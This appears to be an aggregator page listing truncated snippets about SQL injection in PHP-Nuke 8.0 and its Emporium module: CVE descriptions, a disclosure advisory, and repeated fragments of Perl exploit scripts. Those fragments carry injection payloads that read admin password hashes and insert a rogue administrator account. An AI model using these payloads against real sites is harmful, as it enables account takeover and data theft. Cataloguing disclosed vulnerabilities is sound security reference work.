Sql injection

SQL injection vulnerability in index.php in Francisco Burzi PHP-Nuke 8.0 Final and earlier, when the "HTTP Referers" block is enabled, allows remote attackers to execute arbitrary SQL commands via the HTTP Referer header HTTPREFERER variable...

CVE-2007-1061

CVE-2007-1061 involves a SQL injection in PHP-Nuke (index.php) for PHP-Nuke 8.0 Final and earlier when the HTTP Referers block is enabled. The vulnerability allows remote attackers to inject SQL via the HTTP_REFERER header (Referer). CVSS metrics from NVD indicate a base score of 6.8 (MEDIUM) wit...

CVE-2007-1061

SQL injection vulnerability in index.php in Francisco Burzi PHP-Nuke 8.0 Final and earlier, when the "HTTP Referers" block is enabled, allows remote attackers to execute arbitrary SQL commands via the HTTP Referer header HTTPREFERER variable...

Sql injection

SQL injection vulnerability in the category file in modules.php in the Emporium 2.3.0 and earlier module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the categoryid parameter...

CVE-2007-1034

SQL injection vulnerability in the category file in modules.php in the Emporium 2.3.0 and earlier module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the categoryid parameter...

CVE-2007-1034

SQL injection vulnerability in the category file in modules.php in the Emporium 2.3.0 and earlier module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the categoryid parameter...

CVE-2007-1034

The CVE-2007-1034 entry describes an SQL injection vulnerability in the Emporium module (PHP-Nuke) affecting version 2.3.0 and earlier. The issue lies in the category_id parameter processed by modules.php, which allows remote attackers to execute arbitrary SQL commands. Observed impact is arbitra...

[Full-disclosure] Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final

Hello, it is my new advisory: Problem:Blind sql injection attack in INSERT syntax Product:PHP-nuke =8.0 Web page:http://phpnuke.org/ Credit:Maciej krasza Kukla @mail:[email protected] homepage:www.krasza.int.pl 1.Description ...PHP-Nuke 8.0 Final version. This version includes a new anti-flood...

PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ================================================================== PHP-Nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE...

PHP-Nuke 8.0 Final - HTTP Referers SQL Injection

PHP-Nuke 8.0 Final - HTTP Referers SQL Injection !/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE radminsuper=1/"; $zadanie-referer$referer;...

PHP-Nuke 8.0 Final - INSERT SQL Injection

PHP-Nuke 8.0 Final - INSERT SQL Injection !/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl';INSERT INTO nukeauthors VALUES 'krasza', 'God', 'http://www.krasza.int.pl', '[email protected]',...

phpnuke-sql.txt

exploit2.asp 'Update: + Get Header 'Update: + Get Whois Info '=============================================================================================== % function functionControl1 setTimeout"functionControl2",2000; function functionControl2 ifdocument.form1.field1.value=="" alert"Exploit...

PHP-Nuke 8.0 Final - &#039;INSERT&#039; SQL Injection

!/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl';INSERT INTO nukeauthors VALUES 'krasza', 'God', 'http://www.krasza.int.pl', '[email protected]', '61af1f6e572d7fe3a72f54a6ac53830e', '0', '1'...

PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)

Exploit for unknown platform in category web applications ================================================================== PHP-Nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza Kuklaemail protected Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; m...

PHP-Nuke 8.0 Final - INSERT Blind SQL Injection (MySQL)

PHP-Nuke 8.0 Final - INSERT Blind SQL Injection MySQL !/usr/bin/perl 0day exploit for PHP-nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my...

PHP-Nuke <= 8.0 Final (INSERT) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications =========================================================== PHP-Nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl';INSERT INTO nukeauthors VALUES 'krasza', 'God',...

PHP-Nuke 8.0 Final - &#039;INSERT&#039; Blind SQL Injection (MySQL)

!/usr/bin/perl 0day exploit for PHP-nuke = 4.0.24, using 'brute force' Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my...

NukeSentinel 2.5.05 - &#039;nsbypass.php&#039; Blind SQL Injection

!/usr/bin/php URL: http://www.acid-root.new.fr/ ------------------------------------------------------------------ Usage: $argv0 -url -victim Opts Options: -isadmin Is the victim an Admin 1 or a normal user default=0 ? -prefix Table prefix default=nuke -tid If you have already used this sploit -b...

PHP-Nuke 8.0 Final - HTTP Referers SQL Injection

!/usr/bin/perl 0day exploit for PHP-nuke new; my $zadanie = HTTP::Request-newGET = $adres; my $respone,$referer; banner; $referer="http://www.krasza.int.pl',NULL,SELECT pwd FROM nukeauthors WHERE radminsuper=1/"; $zadanie-referer$referer; $respone=$ua-request$zadanie; $respone-issuccess or die...

PHP-Nuke &lt;= 8.0 Final (INSERT) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl 0day exploit for PHP-nuke =8.0 Final Sql injection attack in INSERT syntax version for every basePostgreSQL,mssql... except MySQL base Coded by:Maciej krasza [email protected] Screenshot: 0day exploit for PHP-nuke =8.0 Final Sql injection atta...